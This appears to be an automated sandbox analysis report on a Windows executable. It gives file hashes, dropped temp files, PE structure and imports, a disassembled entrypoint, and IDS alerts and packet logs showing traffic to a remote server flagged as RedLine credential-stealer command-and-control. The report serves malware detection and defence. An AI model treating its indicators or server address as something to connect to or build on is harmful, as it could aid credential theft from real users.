Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\Temp\tmpFDC3.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\Temp\tmpFDC4.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\Temp\tmpFDE4.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465449129654801
Encrypted:	false
SSDEEP:	6144:9IXfpi67eLPU9skLmb0b40WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbX:uXD940WlLZMM6YFH1+X
MD5:	3829DC03FE2B43A7753C73DCEA65D5C0
SHA1:	DCC8F43F69F8E7965BFB7ECCEEFA4740C054346A
SHA-256:	97906DEF270CA86AEFB95043E7A0D42CA02CBE93E1BFA1CDF8246E8AC1BFD6F8
SHA-512:	D30D77E2A2393E2DC095B7DDC220181DFB72DA25B967BBD5DB2E0F1BB6F2B79FD661C888473DC8D38E2F755954230D4D4AA7D88E00F8CC266CA011BF9BE2761F
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.K...................................................................................................................................................................................................................................................................................................................................................].........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.914532310189268
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	file.exe
File size:	2'208'256 bytes
MD5:	6a94b94ba557d5d85a1da20213d48974
SHA1:	a311aa3a9243849b883867fa3d772e4c4e95d080
SHA256:	e4a125aa374a939c07ee3172dd5cdb23990096efe7059e9d647f1eaadc32e3dd
SHA512:	a246f8f4341a144f4946179c518fea833dbec7e40c69023e10687f85d97c28e1851334f20260069c0d6500ecb859c2e2553b4492cda22c6145966bc893a54c74
SSDEEP:	24576:kik8FMmBmInQorsb2d4abb3+RaiHmd/on97e5oX5QOGXI+sYSkX:Xk8JB5nQYsbY4abb3j/onlGYAS
TLSH:	D8A5B75378A384BDF1AF90F54E48CADD9527F6703020A5AC3B354B01DA192A0D7EDB7A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...f..f...............*.X....!................@.............................0"......q!...`... ............................

File Icon


Icon Hash:	25da9a82b2a3a3a2

Static PE Info

General

Entrypoint:	0x1400013d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66D9C566 [Thu Sep 5 14:51:18 2024 UTC]
TLS Callbacks:	0x400919c0, 0x1, 0x400b5700, 0x1, 0x400b56d0, 0x1
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	65b1d87ac1af301c77dd3ab457ef3a84

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [001F6075h]
mov dword ptr [eax], 00000001h
call 00007F21B0B7B43Fh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [001F6055h]
mov dword ptr [eax], 00000000h
call 00007F21B0B7B41Fh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007F21B0C2F834h
dec eax
cmp eax, 01h
sbb eax, eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007F21B0B7B679h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
inc ecx
push edi
inc ecx
push esi
inc ecx
push ebp
inc ecx
push esp
push esi
push edi
push ebp
push ebx
dec eax
sub esp, 000000C8h
dec eax
mov esi, ecx
dec eax
mov eax, dword ptr [ecx+00000088h]
dec eax
mov ecx, dword ptr [eax]
dec eax
mov ecx, dword ptr [ecx+20h]
dec eax
mov ecx, dword ptr [ecx+000000A8h]
dec esp
mov edi, dword ptr [ecx+20h]
dec eax
mov ecx, dword ptr [ecx+28h]
dec eax
inc ecx
dec eax
mov ebp, FFFFFFFFh
dec eax
cmovne ebp, ecx
dec eax
lea ecx, dword ptr [esi+60h]
dec esp
lea esi, dword ptr [eax+eax+00000000h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x20b000	0xe38	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20e000	0xf264	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1f8000	0x5850	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x21e000	0x4058	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1f70a0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x20b388	0x2f8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb5728	0xb5800	44260c76b5280fa634c1c9c97ea14766	False	0.49979419550619836	data	6.295100496596141	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xb7000	0x160	0x200	068a07d388f2ec341a2fb3cac527fbd6	False	0.15234375	data	1.0742053803327647	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xb8000	0x13f560	0x13f600	988e9066f993f537cc52298079b19c89	False	0.2502331519080235	data	4.736633707699203	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x1f8000	0x5850	0x5a00	7256f01c176df3e8668837ce20da9e21	False	0.4612847222222222	data	5.948243105118515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x1fe000	0xb910	0xba00	39c6ecdf3aa448575282678e09801e0f	False	0.40030661962365593	data	5.583322867845039	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x20a000	0x200	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x20b000	0xe38	0x1000	0002c8658c8a2c0ec36f2adc5825487c	False	0.29541015625	data	4.007343344383129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x20c000	0x68	0x200	6af9f6275bc794e1343cb62d8441b1ec	False	0.080078125	data	0.3941955643356773	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x20d000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x20e000	0xf264	0xf400	ba1a1e242537e3289001c16ce132530d	False	0.9440957991803278	data	7.8849889905303785	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x21e000	0x4058	0x4200	48bef4355c76476d2c282565d74ddd9a	False	0.22123579545454544	data	5.437797138067844	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x20e0e8	0xecd7	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced	English	United States	0.9612904289884713
RT_GROUP_ICON	0x21cdc0	0x14	data	English	United States	1.1
RT_MANIFEST	0x21cdd4	0x48f	XML 1.0 document, ASCII text			0.40102827763496146

Imports

DLL	Import
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, InitializeCriticalSection, LeaveCriticalSection, RaiseException, RtlUnwindEx, VirtualProtect, VirtualQuery, __C_specific_handler
msvcrt.dll	__getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _fpreset, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcmp, memcpy, memmove, memset, signal, strlen, strncmp, vfprintf
kernel32.dll	AddVectoredExceptionHandler, CloseHandle, CreateFileMappingA, CreateFileW, CreateMutexA, CreateThread, CreateToolhelp32Snapshot, DuplicateHandle, FormatMessageW, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, GetEnvironmentVariableW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFullPathNameW, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessHeap, GetStdHandle, HeapAlloc, HeapCreate, HeapFree, HeapReAlloc, InitOnceBeginInitialize, InitOnceComplete, MapViewOfFile, Module32FirstW, Module32NextW, MultiByteToWideChar, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetLastError, SetThreadStackGuarantee, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnmapViewOfFile, WaitForSingleObject, WriteConsoleW
ntdll.dll	NtWriteFile, RtlNtStatusToDosError
api-ms-win-core-synch-l1-2-0.dll	WaitOnAddress, WakeByAddressAll, WakeByAddressSingle
bcryptprimitives.dll	ProcessPrng

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-05T20:25:15.140795+0200	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.4	49730	91.92.253.107	1334	TCP
2024-09-05T20:25:20.137045+0200	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	91.92.253.107	1334	192.168.2.4	49730	TCP
2024-09-05T20:25:20.343929+0200	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.4	49730	91.92.253.107	1334	TCP
2024-09-05T20:25:29.302629+0200	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	91.92.253.107	1334	192.168.2.4	49730	TCP
2024-09-05T20:25:29.302629+0200	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	91.92.253.107	1334	192.168.2.4	49730	TCP
2024-09-05T20:25:29.711888+0200	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.4	49732	91.92.253.107	1334	TCP
2024-09-05T20:25:31.583999+0200	2848200	ETPRO MALWARE RedLine - GetUpdates Request	1	192.168.2.4	49733	91.92.253.107	1334	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 5, 2024 20:25:14.496471882 CEST	49730	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:14.501904964 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:14.502000093 CEST	49730	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:14.505373001 CEST	49730	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:14.510915995 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:14.860531092 CEST	49730	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:14.865417957 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:15.092840910 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:15.140794992 CEST	49730	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:20.132107973 CEST	49730	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:20.132141113 CEST	49730	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:20.137044907 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:20.137121916 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:20.299477100 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:20.343929052 CEST	49730	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:20.404280901 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:20.404298067 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:20.404345989 CEST	49730	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:20.404349089 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:20.404496908 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:20.404506922 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:20.404541016 CEST	49730	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.295869112 CEST	49730	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.296214104 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.301065922 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.301141024 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.301563025 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.302628994 CEST	1334	49730	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.302680016 CEST	49730	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.306387901 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.656766891 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.661722898 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.661739111 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.661746025 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.661755085 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.661767006 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.661828995 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.661837101 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.661853075 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.661906004 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.661917925 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.661947012 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.662009954 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.662045002 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.662079096 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.666759014 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.666770935 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.666795015 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.666805029 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.666812897 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.666827917 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.666904926 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.666951895 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.667097092 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.711724997 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.711888075 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.751610041 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.751781940 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.756747961 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.756758928 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.756774902 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.756778955 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.756782055 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.756784916 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.756838083 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.756891966 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.756897926 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.756927013 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.756947994 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.756974936 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.756992102 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.757005930 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.757019043 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.757028103 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.757040977 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.757049084 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.757066965 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.757108927 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.758785009 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.759161949 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.762342930 CEST	1334	49732	91.92.253.107	192.168.2.4
